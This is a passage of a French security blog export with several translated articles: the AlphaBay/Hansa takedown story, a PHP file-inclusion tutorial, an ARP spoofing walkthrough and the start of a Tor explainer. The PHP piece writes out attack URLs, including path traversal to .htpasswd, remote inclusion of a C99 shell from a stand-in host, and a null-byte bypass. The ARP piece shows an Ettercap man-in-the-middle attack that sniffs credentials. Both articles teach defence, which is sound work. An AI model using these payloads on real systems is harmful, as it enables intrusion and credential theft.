au moins un serveur a été saisi tandis qu\u0026rsquo;aucune arrestation n\u0026rsquo;a eu lieu. TVA Nouvelles a interviewé la capitaine canadienne Camille Habel qui a annoncé qu\u0026rsquo;une enquête était en cours et qu\u0026rsquo;elle n\u0026rsquo;était donc pas en mesure de donner beaucoup de détails, mais que d\u0026rsquo;autres informations suivraient. Pendant ce temps, un Canadien d\u0026rsquo;environ 25 ans a été signalé arrêté dans une autre opération conjointe du FBI, de la DEA et de la Police royale thaïlandaise à Bangkok.\nIl n\u0026rsquo;a pas fallu longtemps avant qu\u0026rsquo;une poignée de théories différentes émergent. En premier lieu, les théories prédominantes étaient l\u0026rsquo;exit scam et la maintenance du site. Le 5 juillet, un utilisateur de Reddit nommé Big_Muscles (supposément un modérateur d\u0026rsquo;AlphaBay) a exhorté les gens à « se calmer [et] être patients » tandis que d\u0026rsquo;autres prétendaient avoir détecté des retraits significatifs depuis AlphaBay. En réalité, certains des clusters « enquêtés » appartenaient simplement à Kraken ou Poloniex et n\u0026rsquo;avaient rien à voir avec un potentiel exit scam.\nPeu après, les gens ont commencé à croire de plus en plus à la théorie de la fermeture par les forces de l\u0026rsquo;ordre. Cette théorie s\u0026rsquo;est encore plus répandue à partir du 12 juillet, après qu\u0026rsquo;un Canadien de 26 ans nommé Alexandre CAZES (celui arrêté en Thaïlande) se soit pendu avec une serviette dans sa cellule.\nNaturellement, les utilisateurs d\u0026rsquo;AlphaBay se sont tournés vers le deuxième plus grand marché disponible : Hansa. L\u0026rsquo;afflux de nouveaux utilisateurs a été si conséquent que Hansa a arrêté les inscriptions entre le 9 et le 17 juillet, submergé par l\u0026rsquo;afflux de « réfugiés d\u0026rsquo;AlphaBay ». Nous crawlions ce marché particulier entre le 8 et le 10 juillet et avons utilisé les données obtenues pour dessiner le graphique suivant.\nHansa Market - Activité des utilisateurs depuis l\u0026rsquo;ouverture Hansa affichait trois informations (entre autres) sur la page des vendeurs : leur date d\u0026rsquo;inscription, leur dernière connexion et depuis quand ils étaient en vacances (s\u0026rsquo;ils avaient activé le mode vacances). Notre graphique affiche ces dates de la manière suivante :\nbleu : le nombre de nouveaux vendeurs pendant le mois orange : le nombre de vendeurs vus pour la dernière fois pendant le mois jaune : le nombre de vendeurs ayant activé le mode vacances pendant le mois Hansa comptait un total de 2 133 vendeurs. Deux cent quarante-trois d\u0026rsquo;entre eux n\u0026rsquo;avaient pas de date d\u0026rsquo;inscription mais avaient une date de dernière connexion, et parfois une date de vacances. D\u0026rsquo;après les dates de vacances et de dernière connexion, nous pouvons supposer que la date d\u0026rsquo;inscription est cohérente avec notre graphique précédent. Le graphique révèle deux choses intéressantes. Premièrement, la plupart des vendeurs semblaient être actifs puisque 1 289 ont été vus en juillet et 171 en juin. Ensuite, il confirme que des vendeurs sont venus sur Hansa après qu\u0026rsquo;AlphaBay soit devenu hors ligne. Pour avoir une meilleure idée de l\u0026rsquo;importance de l\u0026rsquo;augmentation des inscriptions, nous avons dessiné un graphique montrant les nouveaux vendeurs jour par jour.\nHansa Market : nombre de nouveaux vendeurs par jour La moyenne de nouveaux utilisateurs par jour est de 91 pour juin. Comme AlphaBay a fermé le 5 juillet et Hansa a arrêté les inscriptions le 9 juillet, nous utiliserons les chiffres du 5 au 8 juillet. Sur cette période, il y a 137 nouveaux vendeurs. Nous pouvons alors calculer que le nombre d\u0026rsquo;inscriptions a augmenté de 372 % après qu\u0026rsquo;AlphaBay soit devenu inaccessible. Ce nombre est probablement encore plus significatif puisqu\u0026rsquo;on dit qu\u0026rsquo;AlphaBay comptait 40 000 utilisateurs et qu\u0026rsquo;il nous manque les dix derniers jours d\u0026rsquo;inscriptions. Comme les acheteurs n\u0026rsquo;ont pas de profil, nous n\u0026rsquo;avons pas pu estimer leur nombre, mais nous pouvons supposer qu\u0026rsquo;il suit la même tendance.\nUne grande surprise\nLe 20 juillet, Hansa a cessé de fonctionner et une conférence de presse (transcription ici) a été tenue par le DOJ. Ils ont confirmé ce que tout le monde soupçonnait : AlphaBay avait été fermé lors d\u0026rsquo;une opération de police. Ils ont également annoncé quelque chose de surprenant : ils contrôlaient Hansa depuis le 20 juin.\nLe même jour, la police néerlandaise a fait une annonce officielle. Elle a expliqué que grâce à l\u0026rsquo;arrestation de deux administrateurs de Hansa Market en Allemagne, elle avait pu prendre le contrôle des serveurs hébergés en Lituanie, et donc intercepter tout ce qui y transitait. C\u0026rsquo;est ainsi qu\u0026rsquo;elle a capturé environ 10 000 adresses de clients de Hansa sur 50 000 transactions. Le nombre de transactions est passé d\u0026rsquo;une moyenne de 1 000/jour à 8 000/jour après le 5 juillet et a constitué un défi pour les autorités qui souhaitaient garder la situation sous contrôle. KrebsOnSecurity a mené une interview avec un policier qui a expliqué que l\u0026rsquo;interdiction des nouvelles inscriptions avait été faite pour pouvoir suivre les commandes.\nMalheureusement, il n\u0026rsquo;y a pas beaucoup d\u0026rsquo;informations sur la façon dont Hansa a été fermé. Ce que nous savons, cependant, c\u0026rsquo;est que Bitdefender a aidé les autorités à un moment donné. De plus, certaines théories sur Internet suggèrent que cela pourrait être lié à la fermeture de lul.to, une plateforme distribuant des copies illégales de livres. Il semble que deux personnes suspectées d\u0026rsquo;en être les administrateurs aient été arrêtées en Allemagne le 21 juin.\nL\u0026rsquo;opération Bayonet ou comment Cazes s\u0026rsquo;est trahi lui-même # Maintenant que la chronologie est connue, examinons ce qui a conduit au succès de l\u0026rsquo;opération Bayonet (qui ne concerne que la fermeture d\u0026rsquo;AlphaBay). La réponse est simple : une mauvaise sécurité opérationnelle (OpSec). Si vous êtes familier avec les détails de la fermeture de Silk Road, vous ressentirez sans doute un sentiment de déjà-vu. La raison (principale) pour laquelle Cazes a été arrêté est qu\u0026rsquo;il a utilisé son adresse email. Sur AlphaBay. Pour être précis, en 2014, certains emails envoyés aux utilisateurs comme les emails de bienvenue ou de récupération de mot de passe incluaient l\u0026rsquo;adresse email personnelle de Cazes Pimp_Alex_91@hotmail.com dans les en-têtes. Vous avez peut-être entendu un jour qu\u0026rsquo;Internet n\u0026rsquo;oublie jamais ? En voici l\u0026rsquo;exemple parfait : si les emails avec l\u0026rsquo;adresse de Cazes ont été envoyés en 2014, les forces de l\u0026rsquo;ordre n\u0026rsquo;en ont eu connaissance qu\u0026rsquo;en 2016.\nÀ partir de là, trouver plus de preuves n\u0026rsquo;a pas été un défi pour les agents fédéraux. L\u0026rsquo;homme avait posté une question fin 2008 sur le célèbre forum commentcamarche.com incluant non seulement son nom, son email mais aussi son pseudonyme, \u0026ldquo;Alpha02\u0026rdquo;. Oui, le même qu\u0026rsquo;il a utilisé plus tard sur AlphaBay. Mais ce n\u0026rsquo;est pas tout. L\u0026rsquo;adresse email était également utilisée dans plusieurs comptes PayPal, ainsi que sur son profil LinkedIn. Enfin, vous l\u0026rsquo;avez probablement deviné maintenant, mais 1991 est l\u0026rsquo;année de naissance de Cazes.\nTous ces éléments sont publics (ou du moins l\u0026rsquo;étaient à un moment donné) et auraient pu être trouvés par n\u0026rsquo;importe qui avec un peu de recherche. À partir de là, les forces de l\u0026rsquo;ordre ont pu trouver toutes les preuves nécessaires pour obtenir un mandat pour les différents lieux et procéder aux perquisitions et à l\u0026rsquo;arrestation.\nQuand la police a fait une descente dans la maison d\u0026rsquo;Alpha02 en Thaïlande, il était sur son ordinateur, essayant de remettre en ligne le marché. Il était connecté à divers endroits, comme sur le forum du marché en tant qu\u0026rsquo;administrateur. Sur son ordinateur, plusieurs fichiers texte contenant les identifiants d\u0026rsquo;accès à de nombreux serveurs, des portefeuilles de cryptomonnaies et des documents comptables ont été trouvés, permettant à la police de saisir les fonds. Ils ont également découvert qu\u0026rsquo;il était très actif sur un forum nommé RooshV sous le pseudonyme \u0026ldquo;rawmero\u0026rdquo; où il avait été observé affichant très publiquement sa richesse.\nEntre autres choses, les forces de l\u0026rsquo;ordre ont saisi plusieurs villas, une Lamborghini, une Porsche Panamera, beaucoup de liquidités, un certain nombre de Bitcoins, d\u0026rsquo;Ethereum, de Monero et de Zcash (environ 8,8 millions de dollars). Selon les documents trouvés sur l\u0026rsquo;ordinateur, Cazes estimait sa fortune à une valeur nette de 23 033 975 $. Rien de tout cela ne pouvait être lié à une source légale. Il possédait une entreprise appelée \u0026ldquo;EBX Technology\u0026rdquo; et prétendait être un investisseur ayant fait fortune avec Bitcoin. En réalité, le compte bancaire d\u0026rsquo;EBX avait peu ou pas d\u0026rsquo;activité. Peut-être pensait-il qu\u0026rsquo;acheter une citoyenneté économique à Antigua le protégerait\u0026hellip; Grosse erreur.\nQuelques chiffres sur AlphaBay et l\u0026rsquo;avenir des marchés noirs\nAlphaBay a fonctionné de juillet 2015 à juillet 2017. Le marché était en pré-lancement jusqu\u0026rsquo;en décembre 2015, date à laquelle il est devenu accessible au public. Pendant cette période, le volume échangé estimé se chiffre en centaines de millions de dollars. En se basant sur la valeur nette de la fortune de Cazes et sur les frais perçus par le service (de 2 % à 4 % par vente, selon le volume du vendeur et d\u0026rsquo;autres facteurs), nous pouvons estimer le flux d\u0026rsquo;argent quelque part entre 575 849 375 $ et 1 151 698 750 $. Il s\u0026rsquo;agit bien sûr d\u0026rsquo;une estimation approximative qui n\u0026rsquo;est pas précise puisque Cazes devait payer du personnel, des serveurs, etc. En même temps, il a pu faire des investissements lui rapportant de l\u0026rsquo;argent, etc.\nÀ titre de comparaison, le flux d\u0026rsquo;argent représente plusieurs fois celui de Silk Road dont l\u0026rsquo;ancien administrateur a été condamné cette année à la prison à perpétuité, sans possibilité de libération conditionnelle. Cela pourrait expliquer pourquoi Cazes a décidé de mettre fin à ses jours. En juin 2017, pas moins de 369 000 articles étaient en vente sur le marché. Incluant divers types de drogues, des armes à feu, des numéros de cartes de crédit, etc. Selon les données que nous avons collectées, Hansa n\u0026rsquo;avait que 114 728 articles pendant toute sa durée de vie, mais si nous enlevons ceux qui ont été supprimés, seuls 69 970 étaient achetables lors de sa fermeture, ce qui fait une grande différence entre les deux marchés.\nAvec les deux plus grands marchés hors jeu, les utilisateurs de marchés noirs pourraient avoir du mal à satisfaire leurs besoins pendant un certain temps. Bien sûr, il existe d\u0026rsquo;autres marchés noirs, dont Dream Market, qui est considéré comme le numéro trois avec 95 341 articles en vente. Cependant, la confiance aveugle dans l\u0026rsquo;anonymat des marchés noirs que certains utilisateurs avaient est probablement bien entamée désormais. De plus, Dream Market est soupçonné par certains utilisateurs d\u0026rsquo;être infiltré par la police : une adresse IP est présente dans du code de débogage dans un fichier JavaScript.\nEn plus de cela, les forces de l\u0026rsquo;ordre ont déclaré la guerre à ces plateformes lors de la conférence de presse :\nYou cannot hide. We will find you. Dismantling organisation and network, and we will prosecute you.\nLa chasse est lancée, et la vague d\u0026rsquo;arrestations à venir ne va pas améliorer la situation pour les criminels. Néanmoins, de nouvelles solutions ou des marchés leaders émergeront, et les criminels pourraient éventuellement poursuivre leurs activités. Dans tous les cas, les mois à venir seront intéressants.\nPour plus de détails sur AlphaBay, vous pouvez consulter l\u0026rsquo;acte d\u0026rsquo;accusation et la plainte de confiscation.\n","date":"2018-07-06","externalUrl":null,"permalink":"/fr/posts/2018/the-story-behind-the-alphabay-and-hansa-markets-shut-down/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nAvec la fermeture de deux marchés noirs majeurs, juillet a été un mois difficile pour l’économie souterraine. Quelques jours seulement après qu’AlphaBay soit devenu inaccessible, nous avons appris que non seulement AlphaBay avait été fermé par les forces de l’ordre (ce qui était attendu à ce stade), mais aussi que Hansa était géré par celles-ci depuis un mois et avait été transformé en un piège mortel pour ses utilisateurs. Cet article vise à fournir un aperçu de la chronologie des événements ayant mené à ce jour et de la façon dont les forces de l’ordre ont mis en place un piège mortel pour les utilisateurs de ces plateformes.\n","title":"L'histoire derrière la fermeture des marchés AlphaBay et Hansa","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nAujourd\u0026rsquo;hui, nous allons explorer la faille d\u0026rsquo;inclusion avec PHP. Nous verrons comment elle permet d\u0026rsquo;accéder aux fichiers du serveur web et comment elle permet d\u0026rsquo;exécuter des scripts distants. Enfin, nous verrons comment les développeurs peuvent se débarrasser de ce problème.\nQu\u0026rsquo;est-ce que la faille d\u0026rsquo;inclusion ? # En PHP, il existe une fonction qui permet d\u0026rsquo;inclure une page entière dans la page actuelle. Elle porte le nom sans surprise de \u0026ldquo;include\u0026rdquo;. Mal utilisée, elle peut être vraiment dangereuse car elle permet l\u0026rsquo;exécution de code externe, ce qui peut entraîner beaucoup de choses désagréables comme le fait qu\u0026rsquo;un attaquant obtienne des fichiers privés sur le serveur.\nComment ça fonctionne ? # Disons que nous avons un site web où tout le contenu est chargé via le fichier index.php. Ce fichier reçoit en paramètre le nom de la page que nous souhaitons charger grâce à une variable GET. Nous pourrions, par exemple, avoir l\u0026rsquo;URL suivante pour accéder à une liste d\u0026rsquo;articles de blog : www.mywebsite.com/index.php?page=article.php.\nDans notre index.php, nous aurons un appel à la méthode include (plus d\u0026rsquo;explications à ce sujet ici) qui sera effectué sans aucune vérification sur la variable page. Le fichier articles.php sera dans le même répertoire que index.php.\ninclude($_GET[\u0026#39;page\u0026#39;]); C\u0026rsquo;est là que le problème survient. Le développeur a décidé de mettre le vrai nom de fichier dans la variable et puisqu\u0026rsquo;aucune vérification n\u0026rsquo;est effectuée, il est possible d\u0026rsquo;accéder à n\u0026rsquo;importe quel fichier auquel le serveur web a accès ou à n\u0026rsquo;importe quel fichier sur Internet. Par exemple, s\u0026rsquo;il existe un fichier .htpasswd dans /var/security/.htpasswd, il suffit de charger la page www.mywebsite.com/index.php?page=../security/.htpasswd.\nLa deuxième chose qui pourrait être faite est d\u0026rsquo;appeler des scripts sur Internet. Un attaquant pourrait par exemple charger un shell (comme le célèbre C99) sur le serveur et faire ce qu\u0026rsquo;il veut. Il lui suffirait d\u0026rsquo;appeler la page www.mywebsite.com/index.php?page=http://pirate.com/c99.php et c99.php sera exécuté.\nComment prévenir cela ? # Il existe bien sûr un moyen de corriger cela, mais voyons d\u0026rsquo;abord une mauvaise façon de procéder avant de voir la bonne.\nComment mal prévenir cela ? # Si vous avez pensé \u0026ldquo;Je n\u0026rsquo;ai qu\u0026rsquo;à coder en dur une partie du chemin dans l\u0026rsquo;include et le combiner avec la variable GET\u0026rdquo;, vous avez tort. Implémenter cette solution pourrait donner quelque chose comme include('/pages/' . $_GET['page'] '.php');.\nC\u0026rsquo;est efficace contre l\u0026rsquo;inclusion de code distant, mais c\u0026rsquo;est à peu près tout. Il est toujours possible d\u0026rsquo;accéder à n\u0026rsquo;importe quel fichier sur le serveur facilement. D\u0026rsquo;abord, on peut contourner la limitation du répertoire pages simplement en utilisant .. pour remonter au répertoire parent. Ensuite, le .php est inutile aussi. Puisque PHP est exécuté avec le langage C, ajouter %00 permet de placer un octet nul à la fin de la chaîne, ce qui fera que le .php ne sera pas traité. Donc, si nous voulons accéder à notre fichier .htpasswd précédent, nous pourrions simplement utiliser le chemin suivant : ../../security/.htpasswd%00.\nUn exemple de bonne correction # L\u0026rsquo;une des possibilités pour prévenir cette faille est de créer un tableau où l\u0026rsquo;on fait correspondre une clé et le chemin du fichier. Cela pourrait ressembler à ceci :\n$coresp = array( \u0026#39;home\u0026#39; =\u0026gt; \u0026#39;home.php\u0026#39;, \u0026#39;comments\u0026#39; =\u0026gt; \u0026#39;comments.php\u0026#39; ); $to_include = isset($_GET[\u0026#39;page\u0026#39;]) \u0026amp;\u0026amp; array_key_exists($_GET[\u0026#39;page\u0026#39;], $coresp) ? $coresp[$_GET[\u0026#39;page\u0026#39;]] : \u0026#39;home.php\u0026#39;; include($to_include); Dans cet exemple, nous donnerons les clés comme argument GET. Par exemple, www.mywebsite.com/index.php?page=home pour accéder à la page d\u0026rsquo;accueil. Ensuite, nous vérifions si la clé existe dans notre tableau. Si c\u0026rsquo;est le cas, nous prenons la valeur associée à la clé et sinon, nous chargeons simplement la page d\u0026rsquo;accueil. Puisque la valeur donnée dans la variable GET n\u0026rsquo;est jamais transmise à la fonction include, nous sommes en sécurité.\nConfigurer PHP pour limiter les risques # Enfin, on peut modifier la valeur de la variable allow_url_include dans la configuration PHP. Comme son nom l\u0026rsquo;indique, elle empêchera quiconque de charger du contenu distant en utilisant la fonction include. Cependant, cela n\u0026rsquo;est pas suffisant car cela n\u0026rsquo;empêche pas l\u0026rsquo;accès aux fichiers locaux.\n","date":"2017-09-26","externalUrl":null,"permalink":"/fr/posts/2018/php-and-the-include-exploit/","section":"Articles","summary":"La faille d’inclusion PHP peut permettre aux pirates d’accéder aux fichiers de votre serveur et d’exécuter du code à distance. Voyons comment elle fonctionne et comment la prévenir","title":"PHP et la faille d'inclusion","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nL\u0026rsquo;attaque par ARP spoofing, également connue sous le nom d\u0026rsquo;empoisonnement ARP (ARP poisoning), est une technique utilisée pour attaquer les réseaux locaux. Elle permet d\u0026rsquo;intercepter les communications entre deux machines. Cet article explique comment elle fonctionne, comment l\u0026rsquo;utiliser et comment s\u0026rsquo;en protéger.\nLe protocole ARP # Tout d\u0026rsquo;abord, nous devons définir ce qu\u0026rsquo;est le protocole ARP. ARP est l\u0026rsquo;abréviation de \u0026ldquo;Address Resolution Protocol\u0026rdquo; et opère dans la couche Internet du modèle TCP/IP. Je n\u0026rsquo;entrerai pas dans les détails de TCP/IP, mais ce que vous devez savoir, c\u0026rsquo;est que deux types d\u0026rsquo;adresses sont utilisés à ce niveau :\nL\u0026rsquo;adresse IPv4 est une abstraction permettant d\u0026rsquo;identifier les machines sur le réseau. Elle est composée de 4 octets sous la forme A.B.C.D. Notez que si IPv6 est utilisé, le protocole NDP est utilisé à la place d\u0026rsquo;ARP. L\u0026rsquo;adresse MAC est l\u0026rsquo;adresse physique de la carte réseau. Elle est censée être unique et est composée de 6 octets, représentée sous la forme AF:43:3E:54:FF:42. Pour que deux machines communiquent sur le même réseau, c\u0026rsquo;est l\u0026rsquo;adresse MAC qui est utilisée. C\u0026rsquo;est là qu\u0026rsquo;intervient le protocole ARP. Il est chargé de trouver l\u0026rsquo;adresse MAC d\u0026rsquo;une machine à partir de son adresse IP. Pour ce faire, il existe deux solutions. Soit la machine possède déjà une entrée dans son cache et sait quelle adresse MAC correspond à quelle IP, soit non. Si ce n\u0026rsquo;est pas le cas, la machine diffusera une requête sur le réseau (ce qui signifie que toutes les adresses recevront la requête). La machine recherchée est censée être la seule à répondre à l\u0026rsquo;émetteur de la requête.\nCela fonctionne bien, mais aucune vérification n\u0026rsquo;est effectuée sur les différentes requêtes, ce qui rend le protocole non sécurisé.\nDéroulement de l\u0026rsquo;attaque # La théorie # L\u0026rsquo;objectif de l\u0026rsquo;ARP spoofing est de faire croire à une machine que notre machine est celle avec laquelle elle souhaite communiquer. À cette fin, nous allons forger une requête (celle qui est diffusée dans la partie précédente) en nous faisant passer pour le routeur et l\u0026rsquo;envoyer à la victime.\nCette requête sera très similaire à une requête légitime, mais nous modifierons l\u0026rsquo;adresse MAC. Au lieu de l\u0026rsquo;adresse MAC du routeur, nous mettrons l\u0026rsquo;adresse MAC de notre machine (dans le cas où nous voulons nous faire passer pour le routeur ; nous pourrions mettre n\u0026rsquo;importe quelle autre adresse MAC). Lorsque la machine de la victime recevra le paquet, elle mettra à jour son cache avec les informations erronées\u0026hellip; et voilà, nous recevrons désormais tout ce que la victime envoie au routeur. Bien entendu, nous devrons envoyer le paquet forgé régulièrement pour nous assurer que les informations erronées ne sont pas modifiées dans le cache de la victime.\nLa pratique # Avertissement : Mettre en pratique l\u0026rsquo;attaque suivante est illégal, sauf si vous la testez sur votre propre matériel ou avec l\u0026rsquo;autorisation des propriétaires des réseaux et des machines.\nLa théorie c\u0026rsquo;est bien, mais si on pratiquait un peu ? Nous allons maintenant utiliser l\u0026rsquo;ARP spoofing pour réaliser une attaque Man in the Middle. Brièvement, cette attaque consiste à intercepter les communications entre deux machines, c\u0026rsquo;est-à-dire que si Bob et Alice communiquent ensemble, Bob envoie un paquet au routeur, le routeur envoie le paquet à Alice, et ainsi de suite. Désormais, chaque paquet passera par notre ordinateur avant d\u0026rsquo;atteindre sa destination. Cela pourrait être utilisé pour intercepter les communications entre Bob et Alice mais aussi pour modifier le contenu des paquets (par exemple, pour inclure un logiciel malveillant).\nÀ cette fin, nous utiliserons deux outils : Ettercap et Wireshark. Le premier s\u0026rsquo;occupera de l\u0026rsquo;empoisonnement ARP tandis que le second sera utilisé pour visualiser les paquets qui transitent.\nD\u0026rsquo;abord, nous devrons activer le transfert IP (IP forwarding). Si nous ne le faisons pas, les paquets que nous interceptons s\u0026rsquo;arrêteront à notre machine, et donc la communication entre Bob et Alice sera interrompue. Pour ce faire, nous taperons la commande suivante. La modification ne sera pas permanente et sera désactivée au prochain redémarrage de l\u0026rsquo;ordinateur.\nsudo echo 1 \u0026gt; /proc/sys/net/ipv4/ip_forward Une fois cela fait, nous lancerons Ettercap et nous irons dans \u0026ldquo;Sniff / Unified sniffing\u0026rdquo; pour sélectionner l\u0026rsquo;interface que nous utilisons pour nous connecter au réseau (par exemple eth0). Ensuite, nous sélectionnerons notre cible. Pour cela, nous ouvrirons \u0026ldquo;Hosts / Hosts List\u0026rdquo; et exécuterons un scan pour trouver les hôtes connectés au réseau. Vous devriez alors obtenir quelque chose ressemblant à la capture d\u0026rsquo;écran suivante.\nListe des hôtes Ettercap Ensuite, nous définirons notre routeur (192.168.1.1) comme première cible et un ordinateur connecté au réseau (192.168.1.105) comme deuxième cible. Veuillez noter que l\u0026rsquo;ordre des cibles n\u0026rsquo;a pas d\u0026rsquo;importance ici.\nAvant de poursuivre l\u0026rsquo;attaque, ouvrons un terminal sur la machine cible et lançons la commande arp -a qui affichera l\u0026rsquo;état du cache. On peut alors voir que les adresses MAC correctes sont associées aux bonnes adresses IP.\nCorrespondance locale IP/ARP Maintenant, nous allons aller dans \u0026ldquo;Mitm / ARP Poisoning\u0026rdquo; pour lancer l\u0026rsquo;attaque. Avant cela, Wireshark a été lancé et configuré pour voir les requêtes ARP transitant sur le réseau.\nCapture des messages ARP par Wireshark Comme on peut le voir sur Wireshark, nos paquets ARP forgés sont envoyés, vérifions donc à nouveau le cache ARP de la victime pour voir si l\u0026rsquo;attaque a réussi.\nCache ARP empoisonné Sans surprise, on peut observer que le cache ARP de la victime contient l\u0026rsquo;adresse MAC de l\u0026rsquo;attaquant au lieu de celle du routeur.\nMaintenant, quand la machine attaquée envoie des paquets quelque part, au lieu d\u0026rsquo;aller vers le routeur puis là où ils doivent aller, ils passeront d\u0026rsquo;abord par l\u0026rsquo;appareil utilisé pour l\u0026rsquo;attaque. Nous allons maintenant utiliser Wireshark pour inspecter le trafic HTTP provenant de/vers la victime.\nSi nous nous connectons à un site web qui n\u0026rsquo;utilise pas le SSL depuis la machine cible, alors, magie ! Vous pouvez voir sur la capture d\u0026rsquo;écran suivante que les identifiants de connexion ont été interceptés et que la victime essaie d\u0026rsquo;accéder au service avec le couple nom d\u0026rsquo;utilisateur/mot de passe \u0026ldquo;Moi\u0026rdquo; et \u0026ldquo;MonMotDePasse\u0026rdquo;.\nInterception du trafic avec Wireshark Que pouvons-nous en retenir ? # En pratiquant cette attaque, nous avons appris plusieurs choses :\nCette attaque est extrêmement facile à réaliser La personne qui vous a dit de faire attention aux WiFi publics avait raison Le trafic non chiffré, c\u0026rsquo;est mal Autres possibilités offertes par l\u0026rsquo;attaque # Dans cet exemple, nous avons uniquement intercepté les paquets passant par la machine en HTTP, mais il est tout à fait possible (même si plus difficile) de réussir cette attaque en interceptant le trafic HTTPS.\nLa raison pour laquelle c\u0026rsquo;est plus difficile est que le trafic HTTPS utilise des certificats signés. Un individu malveillant devrait alors voler la clé privée du certificat. S\u0026rsquo;il ne le fait pas, une alerte s\u0026rsquo;affichera sur l\u0026rsquo;ordinateur de la victime indiquant que le certificat est invalide (cependant, la victime a toujours la possibilité d\u0026rsquo;ignorer cette alerte).\nL\u0026rsquo;attaquant pourrait également modifier les pages visitées par l\u0026rsquo;utilisateur avec du code Flash ou JavaScript malveillant pour infecter la machine de la victime avec un logiciel malveillant, ou procéder à du DNS spoofing afin de rediriger la victime vers un serveur de son choix.\nComment se protéger # Alors, ARP est vulnérable. Mais heureusement, il existe des moyens de se protéger.\nUtiliser un VPN # C\u0026rsquo;est probablement lorsque vous connectez votre ordinateur à un réseau public (aéroport, hôtel, \u0026hellip;) que vous êtes le plus exposé. Dans ce cas, la meilleure option est d\u0026rsquo;utiliser un VPN avec un killswitch empêchant tout paquet de ne pas passer par celui-ci. Ainsi, le trafic est chiffré et un attaquant potentiel ne pourra rien faire. Vous pourriez dire \u0026ldquo;Oui, mais si je ne me connecte qu\u0026rsquo;à des sites HTTPS, alors c\u0026rsquo;est bon, non ?\u0026rdquo;. La réponse est non. D\u0026rsquo;abord, vous pourriez toujours être victime d\u0026rsquo;empoisonnement DNS. Ensuite, une grande proportion de sites web utilisent HTTPS tout en chargeant du JavaScript via HTTP, donc le risque reste le même !\nUtiliser une table ARP statique # Une autre solution est d\u0026rsquo;utiliser une table ARP statique au lieu d\u0026rsquo;une table dynamique comme dans notre exemple. Cela fonctionne bien mais n\u0026rsquo;est pas nécessairement l\u0026rsquo;option la plus pratique.\nSurveiller le réseau # Il est très facile de détecter les attaques ARP (comme vous l\u0026rsquo;avez peut-être remarqué avec la capture d\u0026rsquo;écran de Wireshark). Vous pourriez utiliser des outils comme Arpwatch, Prelude-IPS ou Etherwall pour les détecter. Encore mieux, si vous utilisez un NIPS (Network Intrusion Prevention System), vous serez en mesure d\u0026rsquo;arrêter l\u0026rsquo;attaque automatiquement.\n","date":"2016-08-08","externalUrl":null,"permalink":"/fr/posts/2018/arp-spoofing-how-it-works-and-how-to-prevent-it/","section":"Articles","summary":"Cet article explique ce que sont les attaques par ARP spoofing, comment en réaliser une, et quels sont les différents mécanismes de protection permettant de les prévenir","title":"ARP Spoofing : comment ça fonctionne et comment s'en protéger","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nDans l\u0026rsquo;article d\u0026rsquo;aujourd\u0026rsquo;hui, nous allons parler de Tor et de la manière dont il peut offrir aux gens une meilleure anonymité sur le web. À cette fin, nous verrons à quoi il sert, comment il fonctionne et ce que sont les services cachés. Enfin, nous parlerons des attaques connues contre ce service et de la bonne façon de l\u0026rsquo;utiliser. Cet article ne vise pas à donner tous les détails sur le fonctionnement du réseau et en particulier des attaques qui le ciblent, mais à en donner un bon aperçu.\nQu\u0026rsquo;est-ce que Tor # Tor, qui signifie \u0026ldquo;The Onion Router\u0026rdquo; (le routeur en oignon), est un réseau décentralisé composé de multiples serveurs appelés nœuds. Son objectif est d\u0026rsquo;anonymiser les échanges TCP. Il pourrait être utilisé par quelqu\u0026rsquo;un souhaitant consulter des sites web censurés dans son pays ou pour accéder à une partie du deep web (d\u0026rsquo;autres services comme I2P permettent d\u0026rsquo;accéder à différentes parties du deep web). Cette partie du web peut être difficile à quantifier, mais certaines publications ont fait des estimations. En 2001, on estimait qu\u0026rsquo;il était 400 à 550 fois plus grand que le World Wide Web. Le deep web contient beaucoup de ressources, mais celles dont on entend le plus parler sont celles liées aux activités illégales comme le trafic de drogue, la maltraitance des enfants, etc. Même si vous n\u0026rsquo;êtes pas familier avec le sujet, vous avez probablement entendu parler de la célèbre place de marché Silk Road. Ce site web était hébergé sur un service caché ; nous en parlerons davantage plus tard.\nComment ça fonctionne ? # Utilisation de base # Dans une utilisation standard du WEB, si Alice souhaite accéder à un site web, elle communiquera et échangera directement avec celui-ci. Ce faisant, elle laissera des traces de sa visite en plusieurs endroits. D\u0026rsquo;abord, son FAI saura qu\u0026rsquo;elle a visité ce site web en particulier, puis le propriétaire du site web saura que l\u0026rsquo;IP a.b.c.d a chargé certaines pages (et d\u0026rsquo;autres informations, mais ce n\u0026rsquo;est pas le sujet ici).\nAvec Tor, cela aurait pu être évité. Reprenons l\u0026rsquo;exemple d\u0026rsquo;Alice souhaitant se connecter au site web de Bob, mais cette fois, elle utilisera Tor. D\u0026rsquo;abord, Tor contactera un serveur qui connaît une liste des nœuds pour savoir à quel nœud elle se connectera (comme on peut le voir sur l\u0026rsquo;image suivante).\nSource: Tor Project Ensuite, un chemin aléatoire d\u0026rsquo;Alice vers le site web sera généré. Le navigateur Tor d\u0026rsquo;Alice contactera le premier nœud qui contactera le deuxième nœud, lequel contactera le troisième nœud (aussi appelé nœud de sortie) qui communiquera avec le site web (comme illustré ci-dessous).\nSource: Tor Project Comme les images le montrent, avec Tor, le trafic est chiffré entre Alice et les nœuds et entre les nœuds eux-mêmes. Le seul trafic non chiffré pourrait se situer entre le site web de Bob et le nœud de sortie. L\u0026rsquo;avantage, c\u0026rsquo;est que les nœuds n\u0026rsquo;ont aucune idée du chemin emprunté par les données. Ils connaissent uniquement les machines avec lesquelles ils communiquent directement, mais ils ne savent pas si ces machines sont des clients ou des nœuds. Enfin, le seul nœud capable de savoir quelles données transitent à travers le réseau est le nœud de sortie, mais il n\u0026rsquo;a aucune idée de à qui ces données appartiennent.\nAvant d\u0026rsquo;être transmis, les paquets sont chiffrés avec la clé publique du nœud de sortie, puis avec la clé publique du nœud précédent, etc. (voir l\u0026rsquo;illustration ci-dessous). Ainsi, pour que le paquet soit utilisable par le nœud de sortie, il doit avoir été 